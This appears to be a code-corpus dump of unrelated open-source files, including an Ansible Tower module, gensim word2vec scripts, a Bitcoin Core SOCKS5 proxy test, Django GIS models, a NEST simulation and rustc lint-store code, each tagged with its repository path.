_accepts_engine_in_init = True
def __init__(self, *args):
MakoLoader.__init__(self, FilesystemLoader(*args))
class MakoAppDirectoriesLoader(MakoLoader):
is_usable = True
_accepts_engine_in_init = True
def __init__(self, *args):
MakoLoader.__init__(self, AppDirectoriesLoader(*args)) | unknown | codeparrot/codeparrot-clean | ||
{
"event1": [
{
"type": "function",
"name": "var_dump",
"priority": 255
},
{
"type": "closure",
"priority": -1
}
],
"event2": [
{
"type": "object",
"name": "Symfony\\Bundle\\FrameworkBundle\\Tests\\Console\\Descriptor\\CallableClass",
"priority": 0
}
]
} | json | github | https://github.com/symfony/symfony | src/Symfony/Bundle/FrameworkBundle/Tests/Fixtures/Descriptor/event_dispatcher_1_events.json |
#!/usr/bin/python
# coding: utf-8 -*-
#
# (c) 2018, Adrien Fleury <fleu42@gmail.com>
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: tower_workflow_template
author: "Adrien Fleury (@fleu42)"
version_added: "2.7"
short_description: create, update, or destroy Ansible Tower workflow template.
description:
- Create, update, or destroy Ansible Tower workflows. See
U(https://www.ansible.com/tower) for an overview.
options:
allow_simultaneous:
description:
- If enabled, simultaneous runs of this job template will be allowed.
required: False
type: bool
description:
description:
- The description to use for the workflow.
required: False
default: null
extra_vars:
description:
- >
Extra variables used by Ansible in YAML or key=value format.
required: False
name:
description:
- The name to use for the workflow.
required: True
organization:
description:
- The organization the workflow is linked to.
required: False
schema:
description:
- >
The schema is a JSON- or YAML-formatted string defining the
hierarchy structure that connects the nodes. Refer to Tower
documentation for more information.
required: False
survey_enabled:
description:
- Setting that variable will prompt the user for job type on the
workflow launch.
required: False
type: bool
survey:
description:
- The definition of the survey associated to the workflow.
required: False
state:
description:
- Desired state of the resource.
required: False
default: "present"
choices: ["present", "absent"]
extends_documentation_fragment: tower
'''
EXAMPLES = '''
- tower_workflow_template:
name: Workflow Template
description: My very first Worflow Template
organization: My optional Organization
schema: "{{ lookup(file, my_workflow.json }}"
- tower_worflow_template:
name: Workflow Template
state: absent
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ansible_tower import (
TowerModule,
tower_auth_config,
tower_check_mode
)
try:
import tower_cli
import tower_cli.exceptions as exc
from tower_cli.conf import settings
except ImportError:
pass
def main():
argument_spec = dict(
name=dict(required=True),
description=dict(required=False),
extra_vars=dict(required=False),
organization=dict(required=False),
allow_simultaneous=dict(type='bool', required=False),
schema=dict(required=False),
survey=dict(required=False),
survey_enabled=dict(type='bool', required=False),
state=dict(choices=['present', 'absent'], default='present'),
)
module = TowerModule(
argument_spec=argument_spec,
supports_check_mode=False
)
name = module.params.get('name')
state = module.params.get('state')
schema = None
if module.params.get('schema'):
schema = module.params.get('schema')
if schema and state == 'absent':
module.fail_json(
msg='Setting schema when state is absent is not allowed',
changed=False
)
json_output = {'workflow_template': name, 'state': state}
tower_auth = tower_auth_config(module)
with settings.runtime_values(**tower_auth):
tower_check_mode(module)
wfjt_res = tower_cli.get_resource('workflow')
params = {}
params['name'] = name
if module.params.get('description'):
params['description'] = module.params.get('description')
if module.params.get('organization'):
organization_res = tower_cli.get_resource('organization')
try:
organization = organization_res.get(
name=module.params.get('organization'))
params['organization'] = organization['id']
except exc.NotFound as excinfo:
module.fail_json(
msg='Failed to update organization source,'
'organization not found: {0}'.format(excinfo),
changed=False
)
if module.params.get('survey'):
params['survey_spec'] = module.params.get('survey')
for key in ('allow_simultaneous', 'extra_vars', 'survey_enabled',
'description'):
if module.params.get(key):
params[key] = module.params.get(key)
try:
if state == 'present':
params['create_on_missing'] = True
result = wfjt_res.modify(**params)
json_output['id'] = result['id']
if schema:
wfjt_res.schema(result['id'], schema)
elif state == 'absent':
params['fail_on_missing'] = False
result = wfjt_res.delete(**params)
except (exc.ConnectionError, exc.BadRequest) as excinfo:
module.fail_json(msg='Failed to update workflow template: \
{0}'.format(excinfo), changed=False)
json_output['changed'] = result['changed']
module.exit_json(**json_output)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
import gensim
import logging
import sys
# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def book_to_sentences(filename):
with open(filename, 'rb') as infile:
sentences = []
sentence = []
for line in infile.readlines():
clean_line = line.lower().replace('-', '').replace(',', '').replace(';', '').replace(':', '').replace('?', '.').replace('!', '.').replace('_', '').replace('\n', '').replace('\r', '').replace('\xef', '').replace('\xbb', '').replace('\xbf', '')
if '.' in clean_line:
for i in range(0, clean_line.count('.')):
sentence.extend(clean_line[:clean_line.find('.')].split())
sentences.append(sentence)
clean_line = clean_line[clean_line.find('.')+1:]
sentence = clean_line[:clean_line.find('.')].split()
else:
sentence.extend(clean_line.split())
return sentences
def train_and_most_similar(filenames, word):
for filename in filenames:
sentences = book_to_sentences(filename)
model = gensim.models.Word2Vec(sentences)
if word in model:
print('{0} most similar words to {1} are {2}'.format(filename.replace('.txt', ''), word, str(model.most_similar(word))))
else:
print('{0} model does not contain the word {1}'.format(filename.replace('.txt', ''), word))
if __name__ == '__main__':
train_and_most_similar(['ulysses.txt', 'metamorphosis.txt', 'leaves_of_grass.txt', 'alices_adventures_in_wonderland.txt'], 'man') | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python2
# Copyright (c) 2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import socket
from test_framework.socks5 import Socks5Configuration, Socks5Command, Socks5Server, AddressType
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
'''
Test plan:
- Start bitcoind's with different proxy configurations
- Use addnode to initiate connections
- Verify that proxies are connected to, and the right connection command is given
- Proxy configurations to test on bitcoind side:
- `-proxy` (proxy everything)
- `-onion` (proxy just onions)
- `-proxyrandomize` Circuit randomization
- Proxy configurations to test on proxy side,
- support no authentication (other proxy)
- support no authentication + user/pass authentication (Tor)
- proxy on IPv6
- Create various proxies (as threads)
- Create bitcoinds that connect to them
- Manipulate the bitcoinds using addnode (onetry) an observe effects
addnode connect to IPv4
addnode connect to IPv6
addnode connect to onion
addnode connect to generic DNS name
'''
class ProxyTest(BitcoinTestFramework):
def __init__(self):
# Create two proxies on different ports
# ... one unauthenticated
self.conf1 = Socks5Configuration()
self.conf1.addr = ('127.0.0.1', 13000 + (os.getpid() % 1000))
self.conf1.unauth = True
self.conf1.auth = False
# ... one supporting authenticated and unauthenticated (Tor)
self.conf2 = Socks5Configuration()
self.conf2.addr = ('127.0.0.1', 14000 + (os.getpid() % 1000))
self.conf2.unauth = True
self.conf2.auth = True
# ... one on IPv6 with similar configuration
self.conf3 = Socks5Configuration()
self.conf3.af = socket.AF_INET6
self.conf3.addr = ('::1', 15000 + (os.getpid() % 1000))
self.conf3.unauth = True
self.conf3.auth = True
self.serv1 = Socks5Server(self.conf1)
self.serv1.start()
self.serv2 = Socks5Server(self.conf2)
self.serv2.start()
self.serv3 = Socks5Server(self.conf3)
self.serv3.start()
def setup_nodes(self):
# Note: proxies are not used to connect to local nodes
# this is because the proxy to use is based on CService.GetNetwork(), which return NET_UNROUTABLE for localhost
return start_nodes(4, self.options.tmpdir, extra_args=[
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf1.addr),'-onion=%s:%i' % (self.conf2.addr),'-proxyrandomize=0'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=%s:%i' % (self.conf2.addr),'-proxyrandomize=1'],
['-listen', '-debug=net', '-debug=proxy', '-proxy=[%s]:%i' % (self.conf3.addr),'-proxyrandomize=0', '-noonion']
])
def node_test(self, node, proxies, auth, test_onion=True):
rv = []
# Test: outgoing IPv4 connection through node
node.addnode("15.61.23.23:1234", "onetry")
cmd = proxies[0].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "15.61.23.23")
assert_equal(cmd.port, 1234)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing IPv6 connection through node
node.addnode("[1233:3432:2434:2343:3234:2345:6546:4534]:5443", "onetry")
cmd = proxies[1].queue.get()
assert(isinstance(cmd, Socks5Command))
# Note: bitcoind's SOCKS5 implementation only sends atyp DOMAINNAME, even if connecting directly to IPv4/IPv6
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "1233:3432:2434:2343:3234:2345:6546:4534")
assert_equal(cmd.port, 5443)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
if test_onion:
# Test: outgoing onion connection through node
node.addnode("bitcoinostk4e4re.onion:8333", "onetry")
cmd = proxies[2].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "bitcoinostk4e4re.onion")
assert_equal(cmd.port, 8333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
# Test: outgoing DNS name connection through node
node.addnode("node.noumenon:8333", "onetry")
cmd = proxies[3].queue.get()
assert(isinstance(cmd, Socks5Command))
assert_equal(cmd.atyp, AddressType.DOMAINNAME)
assert_equal(cmd.addr, "node.noumenon")
assert_equal(cmd.port, 8333)
if not auth:
assert_equal(cmd.username, None)
assert_equal(cmd.password, None)
rv.append(cmd)
return rv
def run_test(self):
# basic -proxy
self.node_test(self.nodes[0], [self.serv1, self.serv1, self.serv1, self.serv1], False)
# -proxy plus -onion
self.node_test(self.nodes[1], [self.serv1, self.serv1, self.serv2, self.serv1], False)
# -proxy plus -onion, -proxyrandomize
rv = self.node_test(self.nodes[2], [self.serv2, self.serv2, self.serv2, self.serv2], True)
# Check that credentials as used for -proxyrandomize connections are unique
credentials = set((x.username,x.password) for x in rv)
assert_equal(len(credentials), 4)
# proxy on IPv6 localhost
self.node_test(self.nodes[3], [self.serv3, self.serv3, self.serv3, self.serv3], False, False)
def networks_dict(d):
r = {}
for x in d['networks']:
r[x['name']] = x
return r
# test RPC getnetworkinfo
n0 = networks_dict(self.nodes[0].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n0[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n0[net]['proxy_randomize_credentials'], True)
assert_equal(n0['onion']['reachable'], True)
n1 = networks_dict(self.nodes[1].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n1[net]['proxy'], '%s:%i' % (self.conf1.addr))
assert_equal(n1[net]['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n1['onion']['proxy_randomize_credentials'], False)
assert_equal(n1['onion']['reachable'], True)
n2 = networks_dict(self.nodes[2].getnetworkinfo())
for net in ['ipv4','ipv6','onion']:
assert_equal(n2[net]['proxy'], '%s:%i' % (self.conf2.addr))
assert_equal(n2[net]['proxy_randomize_credentials'], True)
assert_equal(n2['onion']['reachable'], True)
n3 = networks_dict(self.nodes[3].getnetworkinfo())
for net in ['ipv4','ipv6']:
assert_equal(n3[net]['proxy'], '[%s]:%i' % (self.conf3.addr))
assert_equal(n3[net]['proxy_randomize_credentials'], False)
assert_equal(n3['onion']['reachable'], False)
if __name__ == '__main__':
ProxyTest().main() | unknown | codeparrot/codeparrot-clean | ||
import os
import sys
import ast
import gensim
import json
from gensim import utils
import multiprocessing
from gensim.models import Word2Vec
import logging
import argparse
logger = logging.getLogger(__name__)
import redis
data_obj = redis.Redis("localhost", port=6379, db=10) # 2, 9 (smaller), 10 (larger)
class ContextCorpus(object):
def __init__(self, redis_obj, context_prefix='C', example_prefix='C'):
"""
ContextCorpus(contexts)
Parameters
---------
contexts : dict of sets
Each set in the dict should be an observation occurring within
the same context. E.g., every set should contain all pins by
one client or all fixes by one client.
context_prefix : str, optional
This string will be prepended to all context keys
example_prefix : str, optional
This string will be prepended to all non-context words
Examples
------
# If user 1 bought items 0, 1, 2, 3 and user 2
# bought 3, 4, 5 and user bought item 10
contexts = {1:{0,1,2,3}, 2:{3,4,5}, 3:{10}}
cc = ContextCorpus(contexts)
"""
self.redis_obj = redis_obj
self.context_prefix = context_prefix
self.example_prefix = example_prefix
def __iter__(self):
"""Create 'sentences' that start with the context as a word
and then also have items as words on the same line """
count = 0
for key in self.redis_obj.keys("*"):
count+=1
line = [self.context_prefix + str(key)]
line += [self.example_prefix + str(i) for i in ast.literal_eval(self.redis_obj.get(key))]
count+=1
if count%5000 == 0 :
print "Meta loaded: %s" %count
#print count
#print line
yield line
def train(model_file):
contexts = ContextCorpus(data_obj)
model = gensim.models.Word2Vec(contexts, min_count=5, workers= multiprocessing.cpu_count(), negative=3, sg=1, size = 300, sample=1e-3, hs=1, window = 5) #a1
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=3, sg=0, size = 300, sample=1e-5, hs=0, window = 5) #a2
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=5, sg=0, size = 300, sample=1e-3, hs=1, window = 5) #a3
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=10, sg=1, size = 300, sample=1e-3, hs=0, window = 5) #a4
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=10, sg=1, size = 300, sample=1e-5, hs=0, window = 5) #a5
#model = gensim.models.Word2Vec(contexts, min_count=5, workers=4, negative=3, sg=0, size = 300, sample=1e-4, hs=1, window = 5) #a6
# ./word2vec -train train100B.txt -read-vocab voc -output vectors.bin -cbow 1 -size 300 -window 5 -negative 3 -hs 0 -sample 1e-5 -threads 12 -binary 1 -min-count 10
model.init_sims(replace=True)
model.save(model_file)
if __name__ == "__main__":
logging.root.setLevel(level=logging.INFO)
logger.info("running %s", ' '.join(sys.argv))
model_file = 'data/models/user_local_context_v1_large.txt'
train(model_file)
logger.info("Saving model file %s in %s", model_file, os.path.abspath(model_file)) | unknown | codeparrot/codeparrot-clean | ||
"""
The GeometryColumns and SpatialRefSys models for the SpatiaLite backend.
"""
from django.db import models
from django.contrib.gis.db.backends.base import SpatialRefSysMixin
class GeometryColumns(models.Model):
"""
The 'geometry_columns' table from SpatiaLite.
"""
f_table_name = models.CharField(max_length=256)
f_geometry_column = models.CharField(max_length=256)
type = models.CharField(max_length=30)
coord_dimension = models.IntegerField()
srid = models.IntegerField(primary_key=True)
spatial_index_enabled = models.IntegerField()
class Meta:
db_table = 'geometry_columns'
managed = False
@classmethod
def table_name_col(cls):
"""
Returns the name of the metadata column used to store the
the feature table name.
"""
return 'f_table_name'
@classmethod
def geom_col_name(cls):
"""
Returns the name of the metadata column used to store the
the feature geometry column.
"""
return 'f_geometry_column'
def __unicode__(self):
return "%s.%s - %dD %s field (SRID: %d)" % \
(self.f_table_name, self.f_geometry_column,
self.coord_dimension, self.type, self.srid)
class SpatialRefSys(models.Model, SpatialRefSysMixin):
"""
The 'spatial_ref_sys' table from SpatiaLite.
"""
srid = models.IntegerField(primary_key=True)
auth_name = models.CharField(max_length=256)
auth_srid = models.IntegerField()
ref_sys_name = models.CharField(max_length=256)
proj4text = models.CharField(max_length=2048)
@property
def wkt(self):
from django.contrib.gis.gdal import SpatialReference
return SpatialReference(self.proj4text).wkt
class Meta:
db_table = 'spatial_ref_sys'
managed = False | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
#
# one_neuron_with_noise.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
One neuron with noise
----------------------
This script simulates a neuron with input from the ``poisson_generator``, and
records the neuron's membrane potential.
"""
###############################################################################
# First, we import all necessary modules needed to simulate, analyze and
# plot our example. Additionally, we set the verbosity to only show warnings
# and reset the kernel.
# Resetting the kernel removes any nodes we may have created previously and
# resets the internal clock to zero. This allows us to execute the script
# several times in a Python shell without interference from previous NEST
# simulations.
import nest
import nest.voltage_trace
nest.set_verbosity("M_WARNING")
nest.ResetKernel()
###############################################################################
# Second, the nodes (the neuron, poisson generator (two of them), and the
# voltmeter) are created using the ``Create`` function.
# We store the returned handles in variables for later reference.
neuron = nest.Create("iaf_psc_alpha")
noise = nest.Create("poisson_generator", 2)
voltmeter = nest.Create("voltmeter")
###############################################################################
# Third, the Poisson generator is configured using ``SetStatus``, which expects
# a list of node handles and a list of parameter dictionaries. We set the
# Poisson generators to 8,000 Hz and 15,000 Hz, respectively. Note that we do
# not need to set parameters for the neuron and the voltmeter, since they have
# satisfactory defaults.
noise.set([{"rate": 80000.0}, {"rate": 15000.0}])
###############################################################################
# Fourth, the neuron is connected to the ``poisson_generator`` and to the
# ``voltmeter``. We also specify the synaptic weight and delay in this step.
nest.Connect(noise, neuron, syn_spec={'weight': [[1.2, -1.0]], 'delay': 1.0})
nest.Connect(voltmeter, neuron)
###############################################################################
# Now we simulate the network using ``Simulate``, which takes the
# desired simulation time in milliseconds.
nest.Simulate(1000.0)
###############################################################################
# Finally, we plot the neuron's membrane potential as a function of
# time.
nest.voltage_trace.from_device(voltmeter)
nest.voltage_trace.show() | unknown | codeparrot/codeparrot-clean | ||
//! Basic types for managing and implementing lints.
//!
//! See <https://rustc-dev-guide.rust-lang.org/diagnostics.html> for an
//! overview of how lints are implemented.
use std::cell::Cell;
use std::slice;
use rustc_ast::BindingMode;
use rustc_ast::util::parser::ExprPrecedence;
use rustc_data_structures::fx::FxIndexMap;
use rustc_data_structures::sync;
use rustc_data_structures::unord::UnordMap;
use rustc_errors::{Diag, LintBuffer, LintDiagnostic, MultiSpan};
use rustc_feature::Features;
use rustc_hir::def::Res;
use rustc_hir::def_id::{CrateNum, DefId};
use rustc_hir::definitions::{DefPathData, DisambiguatedDefPathData};
use rustc_hir::{Pat, PatKind};
use rustc_middle::bug;
use rustc_middle::lint::LevelAndSource;
use rustc_middle::middle::privacy::EffectiveVisibilities;
use rustc_middle::ty::layout::{LayoutError, LayoutOfHelpers, TyAndLayout};
use rustc_middle::ty::print::{PrintError, PrintTraitRefExt as _, Printer, with_no_trimmed_paths};
use rustc_middle::ty::{self, GenericArg, RegisteredTools, Ty, TyCtxt, TypingEnv, TypingMode};
use rustc_session::lint::{FutureIncompatibleInfo, Lint, LintExpectationId, LintId};
use rustc_session::{DynLintStore, Session};
use rustc_span::edit_distance::find_best_match_for_names;
use rustc_span::{Ident, Span, Symbol, sym};
use tracing::debug;
use {rustc_abi as abi, rustc_hir as hir};
use self::TargetLint::*;
use crate::levels::LintLevelsBuilder;
use crate::passes::{EarlyLintPassObject, LateLintPassObject};
type EarlyLintPassFactory = dyn Fn() -> EarlyLintPassObject + sync::DynSend + sync::DynSync;
type LateLintPassFactory =
dyn for<'tcx> Fn(TyCtxt<'tcx>) -> LateLintPassObject<'tcx> + sync::DynSend + sync::DynSync;
/// Information about the registered lints.
pub struct LintStore {
/// Registered lints.
lints: Vec<&'static Lint>,
/// Constructor functions for each variety of lint pass.
///
/// These should only be called once, but since we want to avoid locks or
/// interior mutability, we don't enforce this (and lints should, in theory,
/// be compatible with being constructed more than once, though not
/// necessarily in a sane manner. This is safe though.)
pub pre_expansion_passes: Vec<Box<EarlyLintPassFactory>>,
pub early_passes: Vec<Box<EarlyLintPassFactory>>,
pub late_passes: Vec<Box<LateLintPassFactory>>,
/// This is unique in that we construct them per-module, so not once.
pub late_module_passes: Vec<Box<LateLintPassFactory>>,
/// Lints indexed by name.
by_name: UnordMap<String, TargetLint>,
/// Map of registered lint groups to what lints they expand to.
lint_groups: FxIndexMap<&'static str, LintGroup>,
}
impl DynLintStore for LintStore {
fn lint_groups_iter(&self) -> Box<dyn Iterator<Item = rustc_session::LintGroup> + '_> {
Box::new(self.get_lint_groups().map(|(name, lints, is_externally_loaded)| {
rustc_session::LintGroup { name, lints, is_externally_loaded }
}))
}
}
/// The target of the `by_name` map, which accounts for renaming/deprecation.
#[derive(Debug)]
enum TargetLint {
/// A direct lint target
Id(LintId),
/// Temporary renaming, used for easing migration pain; see #16545
Renamed(String, LintId),
/// Lint with this name existed previously, but has been removed/deprecated.
/// The string argument is the reason for removal.
Removed(String),
/// A lint name that should give no warnings and have no effect.
///
/// This is used by rustc to avoid warning about old rustdoc lints before rustdoc registers
/// them as tool lints.
Ignored,
}
struct LintAlias {
name: &'static str,
/// Whether deprecation warnings should be suppressed for this alias.
silent: bool,
}
struct LintGroup {
lint_ids: Vec<LintId>,
is_externally_loaded: bool,
depr: Option<LintAlias>,
}
#[derive(Debug)]
pub enum CheckLintNameResult<'a> {
Ok(&'a [LintId]),
/// Lint doesn't exist. Potentially contains a suggestion for a correct lint name.
NoLint(Option<(Symbol, bool)>),
/// The lint refers to a tool that has not been registered.
NoTool,
/// The lint has been renamed to a new name.
Renamed(String),
/// The lint has been removed due to the given reason.
Removed(String),
/// The lint is from a tool. The `LintId` will be returned as if it were a
/// rustc lint. The `Option<String>` indicates if the lint has been
/// renamed.
Tool(&'a [LintId], Option<String>),
/// The lint is from a tool. Either the lint does not exist in the tool or
/// the code was not compiled with the tool and therefore the lint was
/// never added to the `LintStore`.
MissingTool,
}
impl LintStore {
pub fn new() -> LintStore {
LintStore {
lints: vec![],
pre_expansion_passes: vec![],
early_passes: vec![],
late_passes: vec![],
late_module_passes: vec![],
by_name: Default::default(),
lint_groups: Default::default(),
}
}
pub fn get_lints<'t>(&'t self) -> &'t [&'static Lint] {
&self.lints
}
pub fn get_lint_groups(&self) -> impl Iterator<Item = (&'static str, Vec<LintId>, bool)> {
self.lint_groups
.iter()
.filter(|(_, LintGroup { depr, .. })| {
// Don't display deprecated lint groups.
depr.is_none()
})
.map(|(k, LintGroup { lint_ids, is_externally_loaded, .. })| {
(*k, lint_ids.clone(), *is_externally_loaded)
})
}
pub fn register_early_pass(
&mut self,
pass: impl Fn() -> EarlyLintPassObject + 'static + sync::DynSend + sync::DynSync,
) {
self.early_passes.push(Box::new(pass));
}
/// This lint pass is softly deprecated. It misses expanded code and has caused a few
/// errors in the past. Currently, it is only used in Clippy. New implementations
/// should avoid using this interface, as it might be removed in the future.
///
/// * See [rust#69838](https://github.com/rust-lang/rust/pull/69838)
/// * See [rust-clippy#5518](https://github.com/rust-lang/rust-clippy/pull/5518)
pub fn register_pre_expansion_pass(
&mut self,
pass: impl Fn() -> EarlyLintPassObject + 'static + sync::DynSend + sync::DynSync,
) {
self.pre_expansion_passes.push(Box::new(pass));
}
pub fn register_late_pass(
&mut self,
pass: impl for<'tcx> Fn(TyCtxt<'tcx>) -> LateLintPassObject<'tcx>
+ 'static
+ sync::DynSend
+ sync::DynSync,
) {
self.late_passes.push(Box::new(pass));
}
pub fn register_late_mod_pass(
&mut self,
pass: impl for<'tcx> Fn(TyCtxt<'tcx>) -> LateLintPassObject<'tcx>
+ 'static
+ sync::DynSend
+ sync::DynSync,
) {
self.late_module_passes.push(Box::new(pass));
}
/// Helper method for register_early/late_pass
pub fn register_lints(&mut self, lints: &[&'static Lint]) {
for lint in lints {
self.lints.push(lint);
let id = LintId::of(lint);
if self.by_name.insert(lint.name_lower(), Id(id)).is_some() {
bug!("duplicate specification of lint {}", lint.name_lower())
}
if let Some(FutureIncompatibleInfo { reason, .. }) = lint.future_incompatible {
if let Some(edition) = reason.edition() {
self.lint_groups
.entry(edition.lint_name())
.or_insert(LintGroup {
lint_ids: vec![],
is_externally_loaded: lint.is_externally_loaded,
depr: None,
})
.lint_ids
.push(id);
} else {
// Lints belonging to the `future_incompatible` lint group are lints where a
// future version of rustc will cause existing code to stop compiling.
// Lints tied to an edition don't count because they are opt-in.
self.lint_groups
.entry("future_incompatible")
.or_insert(LintGroup {
lint_ids: vec![],
is_externally_loaded: lint.is_externally_loaded,
depr: None,
})
.lint_ids
.push(id);
}
}
}
}
fn insert_group(&mut self, name: &'static str, group: LintGroup) {
let previous = self.lint_groups.insert(name, group);
if previous.is_some() {
bug!("group {name:?} already exists");
}
}
pub fn register_group_alias(&mut self, group_name: &'static str, alias: &'static str) {
let Some(LintGroup { lint_ids, .. }) = self.lint_groups.get(group_name) else {
bug!("group alias {alias:?} points to unregistered group {group_name:?}")
};
self.insert_group(
alias,
LintGroup {
lint_ids: lint_ids.clone(),
is_externally_loaded: false,
depr: Some(LintAlias { name: group_name, silent: true }),
},
);
}
pub fn register_group(
&mut self,
is_externally_loaded: bool,
name: &'static str,
deprecated_name: Option<&'static str>,
to: Vec<LintId>,
) {
if let Some(deprecated) = deprecated_name {
self.insert_group(
deprecated,
LintGroup {
lint_ids: to.clone(),
is_externally_loaded,
depr: Some(LintAlias { name, silent: false }),
},
);
}
self.insert_group(name, LintGroup { lint_ids: to, is_externally_loaded, depr: None });
}
/// This lint should give no warning and have no effect.
///
/// This is used by rustc to avoid warning about old rustdoc lints before rustdoc registers them as tool lints.
#[track_caller]
pub fn register_ignored(&mut self, name: &str) {
if self.by_name.insert(name.to_string(), Ignored).is_some() {
bug!("duplicate specification of lint {}", name);
}
}
/// This lint has been renamed; warn about using the new name and apply the lint.
#[track_caller]
pub fn register_renamed(&mut self, old_name: &str, new_name: &str) {
let Some(&Id(target)) = self.by_name.get(new_name) else {
bug!("invalid lint renaming of {} to {}", old_name, new_name);
};
self.by_name.insert(old_name.to_string(), Renamed(new_name.to_string(), target));
}
pub fn register_removed(&mut self, name: &str, reason: &str) {
self.by_name.insert(name.into(), Removed(reason.into()));
}
pub fn find_lints(&self, lint_name: &str) -> Option<&[LintId]> {
match self.by_name.get(lint_name) {
Some(Id(lint_id)) => Some(slice::from_ref(lint_id)),
Some(Renamed(_, lint_id)) => Some(slice::from_ref(lint_id)),
Some(Removed(_)) => None,
Some(Ignored) => Some(&[]),
None => match self.lint_groups.get(lint_name) {
Some(LintGroup { lint_ids, .. }) => Some(lint_ids),
None => None,
},
}
}
/// True if this symbol represents a lint group name.
pub fn is_lint_group(&self, lint_name: Symbol) -> bool {
debug!(
"is_lint_group(lint_name={:?}, lint_groups={:?})",
lint_name,
self.lint_groups.keys().collect::<Vec<_>>()
);
let lint_name_str = lint_name.as_str();
self.lint_groups.contains_key(lint_name_str) || {
let warnings_name_str = crate::WARNINGS.name_lower();
lint_name_str == warnings_name_str
}
}
/// Checks the name of a lint for its existence, and whether it was
/// renamed or removed. Generates a `Diag` containing a
/// warning for renamed and removed lints. This is over both lint
/// names from attributes and those passed on the command line. Since
/// it emits non-fatal warnings and there are *two* lint passes that
/// inspect attributes, this is only run from the late pass to avoid
/// printing duplicate warnings.
pub fn check_lint_name(
&self,
lint_name: &str,
tool_name: Option<Symbol>,
registered_tools: &RegisteredTools,
) -> CheckLintNameResult<'_> {
if let Some(tool_name) = tool_name {
// FIXME: rustc and rustdoc are considered tools for lints, but not for attributes.
if tool_name != sym::rustc
&& tool_name != sym::rustdoc
&& !registered_tools.contains(&Ident::with_dummy_span(tool_name))
{
return CheckLintNameResult::NoTool;
}
}
let complete_name = if let Some(tool_name) = tool_name {
format!("{tool_name}::{lint_name}")
} else {
lint_name.to_string()
};
// If the lint was scoped with `tool::` check if the tool lint exists
if let Some(tool_name) = tool_name {
match self.by_name.get(&complete_name) {
None => match self.lint_groups.get(&*complete_name) {
// If the lint isn't registered, there are two possibilities:
None => {
// 1. The tool is currently running, so this lint really doesn't exist.
// FIXME: should this handle tools that never register a lint, like rustfmt?
debug!("lints={:?}", self.by_name);
let tool_prefix = format!("{tool_name}::");
return if self.by_name.keys().any(|lint| lint.starts_with(&tool_prefix)) {
self.no_lint_suggestion(&complete_name, tool_name.as_str())
} else {
// 2. The tool isn't currently running, so no lints will be registered.
// To avoid giving a false positive, ignore all unknown lints.
CheckLintNameResult::MissingTool
};
}
Some(LintGroup { lint_ids, depr, .. }) => {
return if let &Some(LintAlias { name, silent: false }) = depr {
CheckLintNameResult::Tool(lint_ids, Some(name.to_string()))
} else {
CheckLintNameResult::Tool(lint_ids, None)
};
}
},
Some(Id(id)) => return CheckLintNameResult::Tool(slice::from_ref(id), None),
// If the lint was registered as removed or renamed by the lint tool, we don't need
// to treat tool_lints and rustc lints different and can use the code below.
_ => {}
}
}
match self.by_name.get(&complete_name) {
Some(Renamed(new_name, _)) => CheckLintNameResult::Renamed(new_name.to_string()),
Some(Removed(reason)) => CheckLintNameResult::Removed(reason.to_string()),
None => match self.lint_groups.get(&*complete_name) {
// If neither the lint, nor the lint group exists check if there is a `clippy::`
// variant of this lint
None => self.check_tool_name_for_backwards_compat(&complete_name, "clippy"),
Some(LintGroup { lint_ids, depr, .. }) => {
// Check if the lint group name is deprecated
if let &Some(LintAlias { name, silent: false }) = depr {
CheckLintNameResult::Tool(lint_ids, Some(name.to_string()))
} else {
CheckLintNameResult::Ok(lint_ids)
}
}
},
Some(Id(id)) => CheckLintNameResult::Ok(slice::from_ref(id)),
Some(&Ignored) => CheckLintNameResult::Ok(&[]),
}
}
fn no_lint_suggestion(&self, lint_name: &str, tool_name: &str) -> CheckLintNameResult<'_> {
let name_lower = lint_name.to_lowercase();
